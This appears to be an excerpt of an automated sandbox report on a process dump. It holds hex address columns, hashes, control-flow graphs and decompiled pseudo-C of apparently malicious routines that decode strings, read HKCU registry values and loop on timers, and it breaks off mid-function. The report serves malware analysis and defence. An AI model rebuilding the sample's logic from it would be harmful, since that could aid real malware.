                                                                                                                                                                                                                                    0x04c323fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c32403
                                                                                                                                                                                                                                    0x04c32408
                                                                                                                                                                                                                                    0x04c3240a
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3240c
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323ef
                                                                                                                                                                                                                                    0x04c323c0
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c322fe
                                                                                                                                                                                                                                    0x04c32303
                                                                                                                                                                                                                                    0x04c32419
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x04c32425
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3241d
                                                                                                                                                                                                                                    0x04c32309
                                                                                                                                                                                                                                    0x04c3230c
                                                                                                                                                                                                                                    0x04c32316
                                                                                                                                                                                                                                    0x04c3231d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c3242d
                                                                                                                                                                                                                                    0x04c32431
                                                                                                                                                                                                                                    0x04c32435
                                                                                                                                                                                                                                    0x04c32435

Memory Dump Source
• Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
• Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
• Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
• Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
Similarity
• Opcode ID: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
• Instruction ID: 51b7eb43e38bd7d4b1f4b45f7d532cd920cd12434c147e91e51e759e63f9c329
• Opcode Fuzzy Hash: c52ed88fe02b27c5285e3b6832d42983ed8de01b7b43e581d57219da155a9cc2
• Instruction Fuzzy Hash: 7851F3B5A00214ABEF20DBA5DC84B6E77BAEB04717F0444A6E503E7140E779FE04AB91
Uniqueness
• Uniqueness Score: -1.00%

Control-flow Graph (control_flow_graph 250, first block 4c33dd9-4c33e1b)
                                                                                                                                                                                                                                    C-Code - Quality: 72%
                                                                                                                                                                                                                                    			E04C33DD9(void* __eflags, char _a4) {
                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				char* _v20;
                                                                                                                                                                                                                                    				intOrPtr _v24;
                                                                                                                                                                                                                                    				void* _v36;
                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                    				char _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				char _v76;
                                                                                                                                                                                                                                    				char _v80;
                                                                                                                                                                                                                                    				char _v84;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(0x2c);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( &_v84);
                                                                                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                                                                                    				L04C3A7BC();
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_t39 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    				_t5 = _t39 + 0x4c3ee40; // 0x410025
                                                                                                                                                                                                                                    				_t41 = E04C36A12(_t5);
                                                                                                                                                                                                                                    				_t75 = _t41;
                                                                                                                                                                                                                                    				_v16 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                    					return _t70;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__(_t75);
                                                                                                                                                                                                                                    				_t43 =  *0x4c3d114(_t75, _a4, _t41); // executed
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t70 = 1;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E04C39039(_t43, _v16);
                                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E04C3A72D(0,  &_a4) != 0) {
                                                                                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 = E04C3809F(0,  *0x4c3d33c);
                                                                                                                                                                                                                                    				_v12 = _t43;
                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t48 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    					_t11 = _t48 + 0x4c3e81a; // 0x65696c43
                                                                                                                                                                                                                                    					_t51 = E04C3809F(0, _t11);
                                                                                                                                                                                                                                    					_t77 = _t51;
                                                                                                                                                                                                                                    					if(_t51 == 0) {
                                                                                                                                                                                                                                    						_t70 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
                                                                                                                                                                                                                                    						_t51 = E04C39039(_t68, _t77);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t70 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						_t43 = E04C39039(_t51, _v12);
                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                    						_t76 = _a4;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							_t43 = E04C31F99(_t76);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(( *0x4c3d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							E04C38F83(_t70, _v88, _v84,  *0x4c3d270, 0);
                                                                                                                                                                                                                                    							_t70 = E04C31C74(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                    							if(_t70 == 0) {
                                                                                                                                                                                                                                    								_v24 = _a4;
                                                                                                                                                                                                                                    								_v20 =  &_v88;
                                                                                                                                                                                                                                    								_t70 = E04C342EA( &_v40, 0);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t51 = E04C39039(_t56, _v88);
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    						_t18 = _t60 + 0x4c3e823; // 0x65696c43
                                                                                                                                                                                                                                    						_t51 = E04C3809F(0, _t18);
                                                                                                                                                                                                                                    						_t79 = _t51;
                                                                                                                                                                                                                                    						if(_t51 == 0) {
                                                                                                                                                                                                                                    							_t70 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t70 = E04C36BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
                                                                                                                                                                                                                                    							_t51 = E04C39039(_t65, _t79);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

























                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f62
                                                                                                                                                                                                                                    0x04c33e47
                                                                                                                                                                                                                                    0x04c33e49
                                                                                                                                                                                                                                    0x04c33e49
                                                                                                                                                                                                                                    0x04c33e54
                                                                                                                                                                                                                                    0x04c33e5b
                                                                                                                                                                                                                                    0x04c33e5e
                                                                                                                                                                                                                                    0x04c33f4d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33e64
                                                                                                                                                                                                                                    0x04c33e64
                                                                                                                                                                                                                                    0x04c33e69
                                                                                                                                                                                                                                    0x04c33e72
                                                                                                                                                                                                                                    0x04c33e77
                                                                                                                                                                                                                                    0x04c33e80
                                                                                                                                                                                                                                    0x04c33ea3
                                                                                                                                                                                                                                    0x04c33e82
                                                                                                                                                                                                                                    0x04c33e98
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33e9a
                                                                                                                                                                                                                                    0x04c33ea6
                                                                                                                                                                                                                                    0x04c33f41
                                                                                                                                                                                                                                    0x04c33f44
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f4e
                                                                                                                                                                                                                                    0x04c33f53
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x04c33f55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33eac
                                                                                                                                                                                                                                    0x04c33eb3
                                                                                                                                                                                                                                    0x04c33ef4
                                                                                                                                                                                                                                    0x04c33f05
                                                                                                                                                                                                                                    0x04c33f1b
                                                                                                                                                                                                                                    0x04c33f1f
                                                                                                                                                                                                                                    0x04c33f24
                                                                                                                                                                                                                                    0x04c33f2a
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f37
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33f3c
                                                                                                                                                                                                                                    0x04c33eb5
                                                                                                                                                                                                                                    0x04c33eba
                                                                                                                                                                                                                                    0x04c33ec3
                                                                                                                                                                                                                                    0x04c33ec8
                                                                                                                                                                                                                                    0x04c33ecc
                                                                                                                                                                                                                                    0x04c33eef
                                                                                                                                                                                                                                    0x04c33ece
                                                                                                                                                                                                                                    0x04c33ee4
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ee6
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c33ef2
                                                                                                                                                                                                                                    0x04c33ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction ID: 9d387f1ebfe547c91a2c4aab81b31bbec42ba792354114a8c996ec2b7d9ed955
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b43c034868cfd7f9715bf18adf1af4f81cc67b7c048f1edb02cd01131c642014
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B415072A01258AFEB11EFE4CC84DEE7BBEEF08746F044165B905A7120D675EE449BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 310 4c3163f-4c3168b 312 4c31691-4c316bd 310->312 313 4c317af-4c317b2 310->313 319 4c316c3-4c316cf call 4c32436 312->319 320 4c317ac 312->320 314 4c317b4 313->314 315 4c317bd-4c317c0 313->315 314->315 316 4c317c2 315->316 317 4c317cb-4c317d2 315->317 316->317 319->320 323 4c316d5-4c316e5 319->323 320->313 323->320 325 4c316eb-4c31711 323->325 325->320 328 4c31717-4c3172b 325->328 330 4c31769-4c3176c 328->330 331 4c3172d-4c31730 328->331 332 4c317a3-4c317a8 330->332 333 4c3176e-4c31773 330->333 331->330 334 4c31732-4c31749 331->334 332->320 333->332 335 4c31775-4c31780 call 4c31a70 333->335 339 4c31760 334->339 340 4c3174b-4c31754 call 4c352f9 334->340 338 4c31785-4c31789 335->338 338->332 341 4c3178b-4c31790 338->341 339->330 340->339 346 4c31756-4c3175e call 4c32436 340->346 343 4c31792-4c3179c 341->343 344 4c3179e 341->344 343->332 344->332 346->339
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction ID: dbe9e1bb92d9f7b5050453583012f2e179f3fb0878b88ca9ce7abfb56fd25053
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c02eaef508261465181cf279662d257f69d0c803da85f324da57aa78124c879d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6951317A900209EFDB00DFE8C8849AEB7F7FF89341B188869E505EB210DB35AD45CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 349 4c36786-4c367b2 call 4c3a7bc 353 4c36913-4c36919 349->353 354 4c367b8-4c36808 call 4c3b0c8 349->354 358 4c3691c-4c36923 353->358 361 4c36883-4c36888 354->361 362 4c3680a-4c3680d 354->362 363 4c36889-4c3688d 361->363 364 4c36818 362->364 365 4c3680f call 4c373fd 362->365 366 4c3688f-4c36891 363->366 367 4c3689d-4c368a1 363->367 369 4c36822 364->369 370 4c36814-4c36816 365->370 366->367 367->363 371 4c368a3-4c368ac 367->371 372 4c36825-4c36829 369->372 370->364 370->369 371->358 373 4c3683b-4c36864 call 4c38504 372->373 374 4c3682b-4c36832 372->374 379 4c36866-4c3686f 373->379 380 4c368ae-4c368b3 373->380 374->373 376 4c36834 374->376 376->373 379->372 383 4c36871-4c36880 call 4c33bf1 379->383 381 4c368d2-4c368da 380->381 382 4c368b5-4c368bb 380->382 385 4c368e0-4c368f3 call 4c3b0c8 381->385 382->361 384 4c368bd-4c368d0 call 4c3a1b0 382->384 383->361 384->385 392 4c368f8-4c36908 385->392 392->372 394 4c3690e 392->394 394->361
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E04C36786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                    				char _t55;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 =  &_v88;
                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                    				L04C3A7BC();
                                                                                                                                                                                                                                    				__imp__(0, 1, 0, _t44, 0, 0x2c);
                                                                                                                                                                                                                                    				_v44 = _t44;
                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					L04C3B0C8();
                                                                                                                                                                                                                                    					_t72 = __imp__; // 0x76d7f710
                                                                                                                                                                                                                                    					_v36 = _t44;
                                                                                                                                                                                                                                    					_v32 = __edx;
                                                                                                                                                                                                                                    					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x4c3d240, 0, 0xff676980, 0xffffffff);
                                                                                                                                                                                                                                    					_t48 =  *0x4c3d26c; // 0x300
                                                                                                                                                                                                                                    					_t64 = __imp__; // 0x76d7f730
                                                                                                                                                                                                                                    					_v40 = _t48;
                                                                                                                                                                                                                                    					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    					_v8 = _t50;
                                                                                                                                                                                                                                    					if(_t50 == 0) {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							 *0x4c3d24c = 5;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t63 = E04C373FD(__edx); // executed
                                                                                                                                                                                                                                    							if(_t63 != 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x4c3d260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                                                    						_t53 = _t66 << 4;
                                                                                                                                                                                                                                    						_t71 = _t75 + (_t66 << 4) - 0x54;
                                                                                                                                                                                                                                    						_t67 = _t66 + 1;
                                                                                                                                                                                                                                    						_v24 = _t66 + 1;
                                                                                                                                                                                                                                    						_t55 = E04C38504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16); // executed
                                                                                                                                                                                                                                    						_v8 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 = _v24;
                                                                                                                                                                                                                                    						_t85 = _t60 - 3;
                                                                                                                                                                                                                                    						_v12 = _t60;
                                                                                                                                                                                                                                    						if(_t60 != 3) {
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_v8 = E04C33BF1(_t67, _t85,  &_v92, _a4, _a8);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						__eflags = _t55 - 0x10d2;
                                                                                                                                                                                                                                    						if(_t55 != 0x10d2) {
                                                                                                                                                                                                                                    							_push(0xffffffff);
                                                                                                                                                                                                                                    							_push(0xff676980);
                                                                                                                                                                                                                                    							_push(0);
                                                                                                                                                                                                                                    							_push( *0x4c3d244);
                                                                                                                                                                                                                                    							goto L21;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags =  *0x4c3d248; // 0x0
                                                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                                                    								goto L12;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t55 = E04C3A1B0();
                                                                                                                                                                                                                                    								_push(0xffffffff);
                                                                                                                                                                                                                                    								_push(0xdc3cba00);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push( *0x4c3d248);
                                                                                                                                                                                                                                    								L21:
                                                                                                                                                                                                                                    								L04C3B0C8();
                                                                                                                                                                                                                                    								_v36 = _t55;
                                                                                                                                                                                                                                    								_v32 = _t71;
                                                                                                                                                                                                                                    								 *_t72(_v44,  &_v36, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                    								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                                                    								_v8 = _t59;
                                                                                                                                                                                                                                    								if(_t59 == 0) {
                                                                                                                                                                                                                                    									goto L6;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                                    					_t73 =  &_v92;
                                                                                                                                                                                                                                    					_t65 = 3;
                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                    						_t51 =  *_t73;
                                                                                                                                                                                                                                    						if(_t51 != 0) {
                                                                                                                                                                                                                                    							__imp__( *0x4c3d238, 0, _t51);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t73 = _t73 + 0x10;
                                                                                                                                                                                                                                    						_t65 = _t65 - 1;
                                                                                                                                                                                                                                    					} while (_t65 != 0);
                                                                                                                                                                                                                                    					__imp__(_v44);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _v8;
                                                                                                                                                                                                                                    				goto L25;
                                                                                                                                                                                                                                    			}






























                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002C.00000002.504260205.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504173703.0000000004C30000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504486235.0000000004C3C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504598622.0000000004C3D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002C.00000002.504651728.0000000004C3F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_44_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction ID: 48ce6cff417ba93398e5ffb0920d9757949738d6c3886166f765129e705a141d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00b1e5946dbc9184d2c3ecca9b79641a024c43d3cce192bc2dd26874098b309a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 01517CB5901228BBDF20DF94DC44EEEBFB9EF49326F204116F811B2180D775AA40DBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 395 4c39152-4c39178 397 4c39246-4c3924c 395->397 398 4c3917e-4c39192 call 4c33aef 395->398 400 4c39197-4c3919b 398->400 401 4c391a1-4c391a6 400->401 402 4c3923d-4c39242 400->402 403 4c391a8-4c391ab 401->403 404 4c391be-4c391c0 401->404 402->397 403->404 405 4c391ad-4c391bc 403->405 404->402 406 4c391c2-4c391e8 404->406 405->404 409 4c39216-4c3921b 406->409 410 4c391ea-4c391f6 call 4c37c14 406->410 412 4c39223-4c3922c 409->412 413 4c3921d-4c3921f 409->413 410->409 417 4c391f8-4c391fd 410->417 415 4c39233-4c39236 412->415 416 4c3922e 412->416 413->412 415->402 418 4c39238 415->418 416->415 417->409 419 4c391ff-4c39202 417->419 418->402 419->409 420 4c39204-4c39214 419->420 420->409
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E04C39152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr* _t35;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr* _t41;
                                                                                                                                                                                                                                    				intOrPtr* _t43;
                                                                                                                                                                                                                                    				intOrPtr* _t45;
                                                                                                                                                                                                                                    				intOrPtr* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                    				intOrPtr* _t55;
                                                                                                                                                                                                                                    				intOrPtr* _t57;
                                                                                                                                                                                                                                    				intOrPtr* _t61;
                                                                                                                                                                                                                                    				intOrPtr* _t65;
                                                                                                                                                                                                                                    				intOrPtr _t68;
                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t55 = _a4;
                                                                                                                                                                                                                                    				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                                                                                                                    				_a4 = 0;
                                                                                                                                                                                                                                    				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                                                                                                                    				if(_t76 < 0) {
                                                                                                                                                                                                                                    					L18:
                                                                                                                                                                                                                                    					return _t76;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t40 = E04C33AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                                                                                                                    				_t76 = _t40;
                                                                                                                                                                                                                                    				if(_t76 >= 0) {
                                                                                                                                                                                                                                    					_t61 = _a28;
                                                                                                                                                                                                                                    					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                                                                                                                    						_t52 = _v8;
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t76 >= 0) {
                                                                                                                                                                                                                                    						_t43 =  *_t55;
                                                                                                                                                                                                                                    						_t68 =  *0x4c3d27c; // 0x202a5a8
                                                                                                                                                                                                                                    						_t20 = _t68 + 0x4c3e1fc; // 0x740053
                                                                                                                                                                                                                                    						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                                                                                                                    						if(_t76 >= 0) {
                                                                                                                                                                                                                                    							_t76 = E04C37C14(_a4);
                                                                                                                                                                                                                                    							if(_t76 >= 0) {
                                                                                                                                                                                                                                    								_t65 = _a28;
